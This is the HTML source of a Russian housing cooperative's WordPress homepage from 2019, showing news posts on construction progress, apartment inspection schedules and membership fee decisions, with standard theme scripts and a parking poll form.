<!DOCTYPE html> <html lang="ru-RU" class="no-js"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <link rel="profile" href="http://gmpg.org/xfn/11"> <link rel="pingback" href="http://www.jskdom.ru/xmlrpc.php"> <!--[if lt IE 9]> <script src="http://www.jskdom.ru/wp-content/themes/twentyfifteen/js/html5.js"></script> <![endif]--> <script>(function(html){html.className = html.className.replace(/\bno-js\b/,'js')})(document.documentElement);</script> <title>ЖСК &quot;Дом учёных&quot;</title> <meta name='robots' content='noindex,follow' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.jskdom.ru\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.7.13"}}; !function(a,b,c){function d(a){var b,c,d,e,f=String.fromCharCode;if(!k||!k.fillText)return!1;switch(k.clearRect(0,0,j.width,j.height),k.textBaseline="top",k.font="600 32px Arial",a){case"flag":return k.fillText(f(55356,56826,55356,56819),0,0),!(j.toDataURL().length<3e3)&&(k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57331,65039,8205,55356,57096),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57331,55356,57096),0,0),c=j.toDataURL(),b!==c);case"emoji4":return k.fillText(f(55357,56425,55356,57341,8205,55357,56507),0,0),d=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55357,56425,55356,57341,55357,56507),0,0),e=j.toDataURL(),d!==e}return!1}function e(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i,j=b.createElement("canvas"),k=j.getContext&&j.getContext("2d");for(i=Array("flag","emoji4"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='contact-form-7-css' href='http://www.jskdom.ru/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=4.3.1' type='text/css' media='all' /> <link rel='stylesheet' id='wp-polls-css' href='http://www.jskdom.ru/wp-content/plugins/wp-polls/polls-css.css?ver=2.73.8' type='text/css' media='all' /> <style id='wp-polls-inline-css' type='text/css'> .wp-polls .pollbar { margin: 1px; font-size: 6px; line-height: 8px; height: 8px; background-image: url('http://www.jskdom.ru/wp-content/plugins/wp-polls/images/default/pollbg.gif'); border: 1px solid #c8c8c8; } </style> <link rel='stylesheet' id='twentyfifteen-fonts-css' href='https://fonts.googleapis.com/css?family=Noto+Sans%3A400italic%2C700italic%2C400%2C700%7CNoto+Serif%3A400italic%2C700italic%2C400%2C700%7CInconsolata%3A400%2C700&#038;subset=latin%2Clatin-ext%2Ccyrillic%2Ccyrillic-ext' type='text/css' media='all' /> <link rel='stylesheet' id='genericons-css' href='http://www.jskdom.ru/wp-content/themes/twentyfifteen/genericons/genericons.css?ver=3.2' type='text/css' media='all' /> <link rel='stylesheet' id='twentyfifteen-style-css' href='http://www.jskdom.ru/wp-content/themes/twentyfifteen/style.css?ver=4.7.13' type='text/css' media='all' /> <!--[if lt IE 9]> <link rel='stylesheet' id='twentyfifteen-ie-css' href='http://www.jskdom.ru/wp-content/themes/twentyfifteen/css/ie.css?ver=20141010' type='text/css' media='all' /> <![endif]--> <!--[if lt IE 8]> <link rel='stylesheet' id='twentyfifteen-ie7-css' href='http://www.jskdom.ru/wp-content/themes/twentyfifteen/css/ie7.css?ver=20141010' type='text/css' media='all' /> <![endif]--> <link rel='stylesheet' id='UserAccessManagerAdmin-css' href='http://www.jskdom.ru/wp-content/plugins/user-access-manager/css/uamAdmin.css?ver=1.0' type='text/css' media='screen' /> <link rel='stylesheet' id='UserAccessManagerLoginForm-css' href='http://www.jskdom.ru/wp-content/plugins/user-access-manager/css/uamLoginForm.css?ver=1.0' type='text/css' media='screen' /> <script type='text/javascript' src='http://www.jskdom.ru/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='http://www.jskdom.ru/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='http://www.jskdom.ru/wp-content/plugins/user-access-manager/js/functions.js?ver=4.7.13'></script> <link rel='https://api.w.org/' href='http://www.jskdom.ru/?rest_route=/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.jskdom.ru/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.jskdom.ru/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 4.7.13" /> <style type="text/css" id="custom-background-css"> body.custom-background { background-image: url("http://www.jskdom.ru/wp-content/uploads/2016/02/1.png"); background-position: left top; background-size: auto; background-repeat: repeat-x; background-attachment: fixed; } </style> <link rel="icon" href="http://www.jskdom.ru/wp-content/uploads/2017/01/cropped-logo2-32x32.jpg" sizes="32x32" /> <link rel="icon" href="http://www.jskdom.ru/wp-content/uploads/2017/01/cropped-logo2-192x192.jpg" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="http://www.jskdom.ru/wp-content/uploads/2017/01/cropped-logo2-180x180.jpg" /> <meta name="msapplication-TileImage" content="http://www.jskdom.ru/wp-content/uploads/2017/01/cropped-logo2-270x270.jpg" /> </head> <body class="home blog custom-background"> <div id="page" class="hfeed site"> <a class="skip-link screen-reader-text" href="#content">Перейти к содержимому</a> <div id="sidebar" class="sidebar"> <header id="masthead" class="site-header" role="banner"> <div class="site-branding"> <h1 class="site-title"><a href="http://www.jskdom.ru/" rel="home">ЖСК &quot;Дом учёных&quot;</a></h1> <button class="secondary-toggle">Меню и виджеты</button> </div><!-- .site-branding --> </header><!-- .site-header --> <div id="secondary" class="secondary"> <nav id="site-navigation" class="main-navigation" role="navigation"> <div class="menu-%d1%84%d0%be%d1%80%d1%83%d0%bc-container"><ul id="menu-%d1%84%d0%be%d1%80%d1%83%d0%bc" class="nav-menu"><li id="menu-item-845" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-845"><a href="http://www.jskdom.ru/forum/">Форум ЖСК</a></li> </ul></div> </nav><!-- .main-navigation --> <div id="widget-area" class="widget-area" role="complementary"> <!-- Плагин: Custom Meta Widget Адрес плагина: http://shinraholdings.com/plugins/custom-meta-widget/--> <aside id="custommetawidget-2" class="widget customMetaWidget"> <h2 class="widget-title">Форма входа</h2> <ul> <li><a href="http://www.jskdom.ru/wp-login.php">Войти</a></li> </ul> </aside><aside id="pages-3" class="widget widget_pages"><h2 class="widget-title">Страницы</h2> <ul> <li class="page_item page-item-510"><a href="http://www.jskdom.ru/?page_id=510">FAQ</a></li> <li class="page_item page-item-1001"><a href="http://www.jskdom.ru/?page_id=1001">WebCam</a></li> <li class="page_item page-item-1432"><a href="http://www.jskdom.ru/?page_id=1432">Голосование: парковочное место под легким навесом</a></li> <li class="page_item page-item-28"><a href="http://www.jskdom.ru/?page_id=28"></a></li> <li class="page_item page-item-535"><a href="http://www.jskdom.ru/?page_id=535">Земельный участок</a></li> <li class="page_item page-item-21"><a href="http://www.jskdom.ru/?page_id=21">Информация о ЖСК</a></li> <li class="page_item page-item-1074"><a href="http://www.jskdom.ru/?page_id=1074">Ипотечное кредитование</a></li> <li class="page_item page-item-24"><a href="http://www.jskdom.ru/?page_id=24">Как стать членом ЖСК?</a></li> <li class="page_item page-item-26"><a href="http://www.jskdom.ru/?page_id=26">О взаимодействии с АИЖК</a></li> <li class="page_item page-item-370"><a href="http://www.jskdom.ru/?page_id=370">Обратная связь</a></li> <li class="page_item page-item-59"><a href="http://www.jskdom.ru/?page_id=59"></a></li> <li class="page_item page-item-786"><a href="http://www.jskdom.ru/?page_id=786">Проекты МКД</a></li> <li class="page_item page-item-368"><a href="http://www.jskdom.ru/?page_id=368">Регистрация</a></li> <li class="page_item page-item-858"><a href="http://www.jskdom.ru/?page_id=858">СМИ о нас</a></li> <li class="page_item page-item-1031 page_item_has_children"><a href="http://www.jskdom.ru/?page_id=1031"></a> <ul class='children'> <li class="page_item page-item-1894"><a href="http://www.jskdom.ru/?page_id=1894"></a></li> <li class="page_item page-item-1885"><a href="http://www.jskdom.ru/?page_id=1885"></a></li> <li class="page_item page-item-1897"><a href="http://www.jskdom.ru/?page_id=1897"></a></li> <li class="page_item page-item-1901"><a href="http://www.jskdom.ru/?page_id=1901"></a></li> </ul> </li> </ul> </aside><aside id="text-5" class="widget widget_text"><h2 class="widget-title">Опрос</h2> <div class="textwidget"><div role="form" class="wpcf7" id="wpcf7-f1431-o1" lang="ru-RU" dir="ltr"> <div class="screen-reader-response"></div> <form action="/#wpcf7-f1431-o1" method="post" class="wpcf7-form" novalidate="novalidate"> <div style="display: none;"> <input type="hidden" name="_wpcf7" value="1431" /> <input type="hidden" name="_wpcf7_version" value="4.3.1" /> <input type="hidden" name="_wpcf7_locale" value="ru_RU" /> <input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f1431-o1" /> <input type="hidden" name="_wpnonce" value="91bf018748" /> </div> <p>Реестровый номер (обязательно)<br /> <span class="wpcf7-form-control-wrap surname"><input type="text" name="surname" value="" size="40" class="wpcf7-form-control wpcf7-text wpcf7-validates-as-required" aria-required="true" aria-invalid="false" /></span> </p> <p>Номер машиноместа (машиномест) (обязательно)<br /> <span class="wpcf7-form-control-wrap firstname"><input type="text" name="firstname" value="" size="40" class="wpcf7-form-control wpcf7-text wpcf7-validates-as-required" aria-required="true" aria-invalid="false" /></span> </p> <p>Хотите ли вы приобрести машиноместо в паркинге под навесом?<br /> <span class="wpcf7-form-control-wrap radio-54"><span class="wpcf7-form-control wpcf7-radio"><span class="wpcf7-list-item first"><input type="radio" name="radio-54" value="Да, 1 место" />&nbsp;<span class="wpcf7-list-item-label">Да, 1 место</span></span><span class="wpcf7-list-item last"><input type="radio" name="radio-54" value="Да, 2 места" />&nbsp;<span class="wpcf7-list-item-label">Да, 2 места</span></span></span></span></p> <p><input type="submit" value="Отправить" class="wpcf7-form-control wpcf7-submit" /></p> <div class="wpcf7-response-output wpcf7-display-none"></div></form></div></div> </aside><aside id="search-2" class="widget widget_search"><form role="search" method="get" class="search-form" action="http://www.jskdom.ru/"> <label> <span class="screen-reader-text">Найти:</span> <input type="search" class="search-field" placeholder="Поиск&hellip;" value="" name="s" /> </label> <input type="submit" class="search-submit screen-reader-text" value="Поиск" /> </form></aside><aside id="archives-2" class="widget widget_archive"><h2 class="widget-title">Архивы</h2> <ul> <li><a href='http://www.jskdom.ru/?m=201905'>Май 2019</a></li> <li><a href='http://www.jskdom.ru/?m=201903'>Март 2019</a></li> <li><a href='http://www.jskdom.ru/?m=201902'>Февраль 2019</a></li> <li><a href='http://www.jskdom.ru/?m=201901'>Январь 2019</a></li> <li><a href='http://www.jskdom.ru/?m=201812'>Декабрь 2018</a></li> <li><a href='http://www.jskdom.ru/?m=201811'>Ноябрь 2018</a></li> <li><a href='http://www.jskdom.ru/?m=201810'>Октябрь 2018</a></li> <li><a href='http://www.jskdom.ru/?m=201809'>Сентябрь 2018</a></li> <li><a href='http://www.jskdom.ru/?m=201808'>Август 2018</a></li> <li><a href='http://www.jskdom.ru/?m=201807'>Июль 2018</a></li> <li><a href='http://www.jskdom.ru/?m=201806'>Июнь 2018</a></li> <li><a href='http://www.jskdom.ru/?m=201805'>Май 2018</a></li> <li><a href='http://www.jskdom.ru/?m=201804'>Апрель 2018</a></li> <li><a href='http://www.jskdom.ru/?m=201803'>Март 2018</a></li> <li><a href='http://www.jskdom.ru/?m=201802'>Февраль 2018</a></li> <li><a href='http://www.jskdom.ru/?m=201801'>Январь 2018</a></li> <li><a href='http://www.jskdom.ru/?m=201712'>Декабрь 2017</a></li> <li><a href='http://www.jskdom.ru/?m=201711'>Ноябрь 2017</a></li> <li><a href='http://www.jskdom.ru/?m=201709'>Сентябрь 2017</a></li> <li><a href='http://www.jskdom.ru/?m=201708'>Август 2017</a></li> <li><a href='http://www.jskdom.ru/?m=201707'>Июль 2017</a></li> <li><a href='http://www.jskdom.ru/?m=201706'>Июнь 2017</a></li> <li><a href='http://www.jskdom.ru/?m=201705'>Май 2017</a></li> <li><a href='http://www.jskdom.ru/?m=201704'>Апрель 2017</a></li> <li><a href='http://www.jskdom.ru/?m=201703'>Март 2017</a></li> <li><a href='http://www.jskdom.ru/?m=201702'>Февраль 2017</a></li> <li><a href='http://www.jskdom.ru/?m=201701'>Январь 2017</a></li> <li><a href='http://www.jskdom.ru/?m=201612'>Декабрь 2016</a></li> <li><a href='http://www.jskdom.ru/?m=201611'>Ноябрь 2016</a></li> <li><a href='http://www.jskdom.ru/?m=201610'>Октябрь 2016</a></li> <li><a href='http://www.jskdom.ru/?m=201609'>Сентябрь 2016</a></li> <li><a href='http://www.jskdom.ru/?m=201608'>Август 2016</a></li> <li><a href='http://www.jskdom.ru/?m=201607'>Июль 2016</a></li> <li><a href='http://www.jskdom.ru/?m=201606'>Июнь 2016</a></li> <li><a href='http://www.jskdom.ru/?m=201605'>Май 2016</a></li> <li><a href='http://www.jskdom.ru/?m=201604'>Апрель 2016</a></li> <li><a href='http://www.jskdom.ru/?m=201603'>Март 2016</a></li> <li><a href='http://www.jskdom.ru/?m=201602'>Февраль 2016</a></li> <li><a href='http://www.jskdom.ru/?m=201601'>Январь 2016</a></li> <li><a href='http://www.jskdom.ru/?m=201512'>Декабрь 2015</a></li> <li><a href='http://www.jskdom.ru/?m=201511'>Ноябрь 2015</a></li> <li><a href='http://www.jskdom.ru/?m=201510'>Октябрь 2015</a></li> <li><a href='http://www.jskdom.ru/?m=201509'>Сентябрь 2015</a></li> <li><a href='http://www.jskdom.ru/?m=201508'>Август 2015</a></li> <li><a href='http://www.jskdom.ru/?m=201507'>Июль 2015</a></li> <li><a href='http://www.jskdom.ru/?m=201506'>Июнь 2015</a></li> <li><a href='http://www.jskdom.ru/?m=201505'>Май 2015</a></li> <li><a href='http://www.jskdom.ru/?m=201504'>Апрель 2015</a></li> <li><a href='http://www.jskdom.ru/?m=201503'>Март 2015</a></li> <li><a href='http://www.jskdom.ru/?m=201502'>Февраль 2015</a></li> <li><a href='http://www.jskdom.ru/?m=201501'>Январь 2015</a></li> <li><a href='http://www.jskdom.ru/?m=201412'>Декабрь 2014</a></li> <li><a href='http://www.jskdom.ru/?m=201411'>Ноябрь 2014</a></li> <li><a href='http://www.jskdom.ru/?m=201410'>Октябрь 2014</a></li> <li><a href='http://www.jskdom.ru/?m=201409'>Сентябрь 2014</a></li> <li><a href='http://www.jskdom.ru/?m=201408'>Август 2014</a></li> <li><a href='http://www.jskdom.ru/?m=201407'>Июль 2014</a></li> <li><a href='http://www.jskdom.ru/?m=201406'>Июнь 2014</a></li> <li><a href='http://www.jskdom.ru/?m=201405'>Май 2014</a></li> <li><a href='http://www.jskdom.ru/?m=201404'>Апрель 2014</a></li> <li><a href='http://www.jskdom.ru/?m=201403'>Март 2014</a></li> <li><a href='http://www.jskdom.ru/?m=201402'>Февраль 2014</a></li> <li><a href='http://www.jskdom.ru/?m=201401'>Январь 2014</a></li> <li><a href='http://www.jskdom.ru/?m=201312'>Декабрь 2013</a></li> <li><a href='http://www.jskdom.ru/?m=201311'>Ноябрь 2013</a></li> <li><a href='http://www.jskdom.ru/?m=201301'>Январь 2013</a></li> </ul> </aside> </div><!-- .widget-area --> </div><!-- .secondary --> </div><!-- .sidebar --> <div id="content" class="site-content"> <div id="primary" class="content-area"> <main id="main" class="site-main" role="main"> <article class="post type-post status-publish format-standard hentry "> <div class="entry-content"> <center><img src="http://www.jskdom.ru/wp-content/uploads/2016/03/logo.png" alt="logo"></center> </div><!-- .entry-content --> </article> <article id="post-2035" class="post-2035 post type-post status-publish format-standard hentry category-2"> <header class="entry-header"> <h2 class="entry-title"><a href="http://www.jskdom.ru/?p=2035" rel="bookmark">Состояние дел на стройплощадке. График осмотров 1 корпуса.</a></h2> </header><!-- .entry-header --> <div class="entry-content"> <p>Уважаемые пайщики!</p> <p>На первом корпусе ЖСК заканчивается установка межкомнатных дверей в квартирах; опанелка и доборы будут установлены на следующей неделе.</p> <p><a href="http://www.jskdom.ru/wp-content/uploads/2019/05/DSCN08611.jpg"><img class="alignnone size-medium wp-image-2034" src="http://www.jskdom.ru/wp-content/uploads/2019/05/DSCN08611-300x225.jpg" alt="" width="300" height="225" srcset="http://www.jskdom.ru/wp-content/uploads/2019/05/DSCN08611-300x225.jpg 300w, http://www.jskdom.ru/wp-content/uploads/2019/05/DSCN08611-768x576.jpg 768w, http://www.jskdom.ru/wp-content/uploads/2019/05/DSCN08611-1024x768.jpg 1024w" sizes="(max-width: 300px) 100vw, 300px" /></a><a href="http://www.jskdom.ru/wp-content/uploads/2019/05/DSCN08561-1.jpg"><img class="alignnone size-medium wp-image-2039" src="http://www.jskdom.ru/wp-content/uploads/2019/05/DSCN08561-1-300x225.jpg" alt="" width="300" height="225" srcset="http://www.jskdom.ru/wp-content/uploads/2019/05/DSCN08561-1-300x225.jpg 300w, http://www.jskdom.ru/wp-content/uploads/2019/05/DSCN08561-1-768x576.jpg 768w, http://www.jskdom.ru/wp-content/uploads/2019/05/DSCN08561-1-1024x768.jpg 1024w" sizes="(max-width: 300px) 100vw, 300px" /></a></p> <p>&nbsp;</p> <p>Проведена работа по устранению недоделок, выявленных ранее. Заканчивается установка витражей (99%) и укладка линолеума (95%). Будущие владельцы квартир 1 корпуса приглашаются на повторный осмотр квартир: с 10 мая &#8212; 13-15 этажи; 11 мая &#8212; 10-12 этажи; 12 мая &#8212; 7-9 этажи; 13 мая &#8212; 4-6 этажи; 14 мая &#8212; 2-3 этажи. Время для осмотра &#8212; с 10 до 13 часов. При себе иметь распечатанный смотровой лист.</p> <p>Во втором корпусе ЖСК закончена шпатлевка квартир (100%), установка входных дверей в квартиры (99%), внутренняя отделка мест общего пользования (95%).</p> <p>Строительство паркинга &#8212; без изменений.</p> <p>С уважением, Правление ЖСК.</p> <p>&nbsp;</p> <p>&nbsp;</p> </div><!-- .entry-content --> <footer class="entry-footer"> <span class="posted-on"><span class="screen-reader-text">Опубликовано </span><a href="http://www.jskdom.ru/?p=2035" rel="bookmark"><time class="entry-date published" datetime="2019-05-08T19:11:04+00:00">08.05.2019</time><time class="updated" datetime="2019-05-08T19:18:31+00:00">08.05.2019</time></a></span><span class="byline"><span class="author vcard"><span class="screen-reader-text">Автор </span><a class="url fn n" href="http://www.jskdom.ru/?author=6">Елена Александровна Петрова</a></span></span><span class="cat-links"><span class="screen-reader-text">Рубрики </span><a href="http://www.jskdom.ru/?cat=2" rel="category">Новости</a></span> </footer><!-- .entry-footer --> </article><!-- #post-## --> <article id="post-2029" class="post-2029 post type-post status-publish format-standard hentry category-2"> <header class="entry-header"> <h2 class="entry-title"><a href="http://www.jskdom.ru/?p=2029" rel="bookmark">Обновлен раздел &#171;Оплата взносов в ЖСК&#187;</a></h2> </header><!-- .entry-header --> <div class="entry-content"> <p>Уважаемые пайщики!</p> <p>В разделе сайта &#171;Оплата взносов в ЖСК&#187; размещена ведомость внесения всех видов взносов в ЖСК по состоянию на 25.04.2019.</p> <p>Правление ЖСК.</p> <p>&nbsp;</p> </div><!-- .entry-content --> <footer class="entry-footer"> <span class="posted-on"><span class="screen-reader-text">Опубликовано </span><a href="http://www.jskdom.ru/?p=2029" rel="bookmark"><time class="entry-date published updated" datetime="2019-05-07T17:54:25+00:00">07.05.2019</time></a></span><span class="byline"><span class="author vcard"><span class="screen-reader-text">Автор </span><a class="url fn n" href="http://www.jskdom.ru/?author=6">Елена Александровна Петрова</a></span></span><span class="cat-links"><span class="screen-reader-text">Рубрики </span><a href="http://www.jskdom.ru/?cat=2" rel="category">Новости</a></span> </footer><!-- .entry-footer --> </article><!-- #post-## --> <article id="post-2018" class="post-2018 post type-post status-publish format-standard hentry category-2"> <header class="entry-header"> <h2 class="entry-title"><a href="http://www.jskdom.ru/?p=2018" rel="bookmark">График проведения первичного осмотра квартир в 1 корпусе</a></h2> </header><!-- .entry-header --> <div class="entry-content"> <p>Уважаемые будущие жильцы первого корпуса!</p> <p>Осмотры квартир проводятся с 26 марта, и на данный момент на осмотр были приглашены жильцы 10-15 этажей.<br /> Для удобства планирования Вашего времени размещаем график осмотра квартир 1 корпуса:<br /> 29 марта, пятница &#8212; 8-9 этажи,<br /> 1 апреля, понедельник &#8212; 6-7 этажи,<br /> 2 апреля, вторник &#8212; 4-5 этажи,<br /> 3 апреля, среда &#8212; 2-3 этажи.<br /> Начало мероприятия в 11.00, подходить на первый этаж 1 корпуса. При себе иметь лист осмотра помещения (http://www.jskdom.ru/wp-content/uploads/2019/03/Лист-осмотра-жилого-помещения-Дом-ученых.doc). Заполненный лист осмотра помещения нужно передать главному инженеру ЖСК Орехову Евгению Анатольевичу (на объекте) или в Правление ЖСК.</p> </div><!-- .entry-content --> <footer class="entry-footer"> <span class="posted-on"><span class="screen-reader-text">Опубликовано </span><a href="http://www.jskdom.ru/?p=2018" rel="bookmark"><time class="entry-date published" datetime="2019-03-27T18:25:59+00:00">27.03.2019</time><time class="updated" datetime="2019-03-27T18:26:44+00:00">27.03.2019</time></a></span><span class="byline"><span class="author vcard"><span class="screen-reader-text">Автор </span><a class="url fn n" href="http://www.jskdom.ru/?author=6">Елена Александровна Петрова</a></span></span><span class="cat-links"><span class="screen-reader-text">Рубрики </span><a href="http://www.jskdom.ru/?cat=2" rel="category">Новости</a></span> </footer><!-- .entry-footer --> </article><!-- #post-## --> <article id="post-2013" class="post-2013 post type-post status-publish format-standard hentry category-2"> <header class="entry-header"> <h2 class="entry-title"><a href="http://www.jskdom.ru/?p=2013" rel="bookmark">О посещении стройплощадки</a></h2> </header><!-- .entry-header --> <div class="entry-content"> <p>Уважаемые пайщики!</p> <p>На этой неделе начинается осмотр квартир будущими жильцами первого корпуса. Ежедневно представитель правления будет приглашать на осмотр до 15 человек. Каждый приглашенный может заполнить лист осмотра помещения (см. раздел Документация), указав на недоделки при их наличии.</p> <p>В воскресенье, 31 марта, второй корпус будет открыт для посещения будущими жильцами с 10 до 12 часов. Если Вы планируете прийти с членами семьи &#8212; просьба не брать маленьких детей.</p> <p>Уважаемые пайщики, убедительная просьба &#8212; в остальное время не беспокоить строителей, не  посещать строительную площадку! Вы не только рискуете своей безопасностью, но и мешаете проведению строительных работ, завершения которых все ждут!</p> <p>С уважением,</p> <p>Правление ЖСК.</p> </div><!-- .entry-content --> <footer class="entry-footer"> <span class="posted-on"><span class="screen-reader-text">Опубликовано </span><a href="http://www.jskdom.ru/?p=2013" rel="bookmark"><time class="entry-date published" datetime="2019-03-25T16:12:46+00:00">25.03.2019</time><time class="updated" datetime="2019-03-25T16:37:44+00:00">25.03.2019</time></a></span><span class="byline"><span class="author vcard"><span class="screen-reader-text">Автор </span><a class="url fn n" href="http://www.jskdom.ru/?author=6">Елена Александровна Петрова</a></span></span><span class="cat-links"><span class="screen-reader-text">Рубрики </span><a href="http://www.jskdom.ru/?cat=2" rel="category">Новости</a></span> </footer><!-- .entry-footer --> </article><!-- #post-## --> <article id="post-2001" class="post-2001 post type-post status-publish format-standard hentry category-2"> <header class="entry-header"> <h2 class="entry-title"><a href="http://www.jskdom.ru/?p=2001" rel="bookmark">О решениях общего собрания ЖСК 14.03.2019</a></h2> </header><!-- .entry-header --> <div class="entry-content"> <p>Уважаемые пайщики!</p> <p>Напоминаем, что 14.03.2019 общим собранием ЖСК  приняты следующие решения относительно внесения взносов в ЖСК:</p> <ol> <li>Установить размер членского взноса на I-II кварталы 2019 года  &#8212; 600 рублей в месяц.</li> <li>Установить срок начала сбора шестого паевого взноса &#8212; 25 марта 2019 года.  Период внесения &#8212; 14 дней. Размер шестого паевого взноса = полная стоимость пая (фактическая площадь квартиры, м.кв. х 34450 руб. + стоимость машино-места/доли машиноместа + стоимость кладового помещения/доли кладового помещения (если есть)) &#8212; сумма ранее уплаченных паевых взносов. Справки о размере и полной стоимости пая и квитанции на оплату шестого паевого взноса будут подготовлены комиссией Правления до 20 марта 2019 года, их можно будет получить у ответственных по организациям членов правления и КРК.</li> </ol> <p>Ведомость внесения всех видов взносов по состоянию на 14 марта 2019 года размещена в разделе &#171;Оплата взносов в ЖСК&#187;. В графе &#171;Членские взносы&#187; произведено начисление взносов за 2 месяца первого квартала 2019 года.</p> <p>С уважением, Правление ЖСК</p> </div><!-- .entry-content --> <footer class="entry-footer"> <span class="posted-on"><span class="screen-reader-text">Опубликовано </span><a href="http://www.jskdom.ru/?p=2001" rel="bookmark"><time class="entry-date published updated" datetime="2019-03-18T15:43:07+00:00">18.03.2019</time></a></span><span class="byline"><span class="author vcard"><span class="screen-reader-text">Автор </span><a class="url fn n" href="http://www.jskdom.ru/?author=6">Елена Александровна Петрова</a></span></span><span class="cat-links"><span class="screen-reader-text">Рубрики </span><a href="http://www.jskdom.ru/?cat=2" rel="category">Новости</a></span> </footer><!-- .entry-footer --> </article><!-- #post-## --> <article id="post-1994" class="post-1994 post type-post status-publish format-standard hentry category-2"> <header class="entry-header"> <h2 class="entry-title"><a href="http://www.jskdom.ru/?p=1994" rel="bookmark">Состояние дел на строительной площадке</a></h2> </header><!-- .entry-header --> <div class="entry-content"> <p>Уважаемые пайщики!</p> <p>На данный момент на втором корпусе ЖСК работы по шпатлевке квартир выполнены на 95%.</p> <p><a href="http://www.jskdom.ru/wp-content/uploads/2019/03/IMG_0853-e1552455645108.jpg"><img class="alignnone size-medium wp-image-1990" src="http://www.jskdom.ru/wp-content/uploads/2019/03/IMG_0853-e1552455645108-225x300.jpg" alt="" width="225" height="300" srcset="http://www.jskdom.ru/wp-content/uploads/2019/03/IMG_0853-e1552455645108-225x300.jpg 225w, http://www.jskdom.ru/wp-content/uploads/2019/03/IMG_0853-e1552455645108-768x1024.jpg 768w" sizes="(max-width: 225px) 100vw, 225px" /></a></p> <p>Внутренняя отделка мест общего пользования выполнена на 65%.</p> <p><a href="http://www.jskdom.ru/wp-content/uploads/2019/03/IMG_0855.jpg"><img class="alignnone size-medium wp-image-1996" src="http://www.jskdom.ru/wp-content/uploads/2019/03/IMG_0855-300x225.jpg" alt="" width="300" height="225" srcset="http://www.jskdom.ru/wp-content/uploads/2019/03/IMG_0855-300x225.jpg 300w, http://www.jskdom.ru/wp-content/uploads/2019/03/IMG_0855-768x576.jpg 768w, http://www.jskdom.ru/wp-content/uploads/2019/03/IMG_0855-1024x768.jpg 1024w" sizes="(max-width: 300px) 100vw, 300px" /></a></p> <p>Монтаж керамогранита на фасаде здания &#8212; 25% (без изменений).</p> <p><strong>На первом корпусе </strong>продолжается установка витражей (выполнено 85% объема работ). Завершена внутренняя отделка мест общего пользования, кладка плитки на лестничных маршах (100%).</p> <p><a href="http://www.jskdom.ru/wp-content/uploads/2019/03/стройплощадка-10.10-075-1.jpg"><img class="alignnone size-medium wp-image-1999" src="http://www.jskdom.ru/wp-content/uploads/2019/03/стройплощадка-10.10-075-1-225x300.jpg" alt="" width="225" height="300" srcset="http://www.jskdom.ru/wp-content/uploads/2019/03/стройплощадка-10.10-075-1-225x300.jpg 225w, http://www.jskdom.ru/wp-content/uploads/2019/03/стройплощадка-10.10-075-1-768x1023.jpg 768w, http://www.jskdom.ru/wp-content/uploads/2019/03/стройплощадка-10.10-075-1-769x1024.jpg 769w" sizes="(max-width: 225px) 100vw, 225px" /></a></p> <p>отделка квартир : поклейка обоев выполнена на 100%; укладка линолеума на 60%, плитка в сан узлах &#8212; 100%; установка розеток и выключателей 100%.</p> <p><a href="http://www.jskdom.ru/wp-content/uploads/2019/03/стройплощадка-10.10-034.jpg"><img class="alignnone size-medium wp-image-1992" src="http://www.jskdom.ru/wp-content/uploads/2019/03/стройплощадка-10.10-034-300x225.jpg" alt="" width="300" height="225" srcset="http://www.jskdom.ru/wp-content/uploads/2019/03/стройплощадка-10.10-034-300x225.jpg 300w, http://www.jskdom.ru/wp-content/uploads/2019/03/стройплощадка-10.10-034-768x577.jpg 768w, http://www.jskdom.ru/wp-content/uploads/2019/03/стройплощадка-10.10-034-1024x769.jpg 1024w" sizes="(max-width: 300px) 100vw, 300px" /></a><a href="http://www.jskdom.ru/wp-content/uploads/2019/03/стройплощадка-10.10-053.jpg"><img class="alignnone size-medium wp-image-1993" src="http://www.jskdom.ru/wp-content/uploads/2019/03/стройплощадка-10.10-053-300x225.jpg" alt="" width="300" height="225" srcset="http://www.jskdom.ru/wp-content/uploads/2019/03/стройплощадка-10.10-053-300x225.jpg 300w, http://www.jskdom.ru/wp-content/uploads/2019/03/стройплощадка-10.10-053-768x577.jpg 768w, 